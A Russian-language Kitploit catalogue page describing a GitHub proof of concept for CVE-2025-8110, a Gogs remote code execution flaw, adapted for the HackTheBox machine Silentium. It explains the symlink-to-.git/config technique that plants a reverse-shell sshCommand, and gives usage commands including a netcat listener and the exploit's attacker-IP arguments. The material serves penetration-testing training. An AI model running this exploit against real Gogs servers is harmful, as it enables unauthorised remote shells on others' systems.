Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 Специально для бокса Silentium на HTB. | Kitploit
Инструменты/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 Специально для бокса Silentium на HTB.

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

Отказ от ответственности: Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение. Используйте его только против систем, на которые у вас есть явное разрешение.


Это модифицированная версия zAbuQasem/gogs-CVE-2025-8110, адаптированная для работы против машины Silentium на HackTheBox. Оригинальный PoC требовал корректировок для обработки специфической конфигурации Gogs и потока аутентификации Silentium.


Уязвимость

CVE-2025-8110 — это уязвимость удаленного выполнения кода в Gogs, самостоятельно размещаемом Git-сервисе.

Конечная точка API обновления файлов Gogs (PUT /api/v1/repos/.../contents/<file>) не проверяет, является ли целевой файл символической ссылкой. Аутентифицированный злоумышленник может поместить симлинк в репозиторий, указывающий на .git/config, а затем с помощью API перезаписать его вредоносной полезной нагрузкой. Полезная нагрузка внедряет пользовательский sshCommand в конфигурацию git, который Gogs выполняет на стороне сервера при следующей SSH-операции с этим репозиторием, что приводит к удаленному выполнению кода.


Что делает PoC

  1. Аутентифицируется в Gogs и извлекает CSRF-токен со страницы входа.
  2. Генерирует токен API Gogs через страницу настроек пользователя.
  3. Создает новый репозиторий через API с включенным SSH.
  4. Клонирует репозиторий локально, размещает симлинк (malicious_link -> .git/config) и отправляет его.
  5. Вызывает API обновления файла для симлинка, записывая вредоносный .git/config, содержащий sshCommand = <обратная оболочка>.
  6. Gogs переходит по симлинку и перезаписывает свой собственный .git/config, запуская оболочку при следующей SSH-операции.

Использование

Установка зависимостей:

root@kitploit:~
pip install -r requirements.txt

Запустите слушатель:

root@kitploit:~
nc -lvnp <PORT>

Запустите эксплойт:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Опционально — маршрутизация через Burp Suite:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
ФлагОписание
-uБазовый URL Gogs
-lhВаш IP атакующего (хост обратной оболочки)
-lpВаш порт слушателя
-unВаше зарегистрированное имя пользователя Gogs
-pwВаш пароль Gogs
-x(Опционально) Маршрутизация трафика через Burp на localhost:8080
Скачать инструмент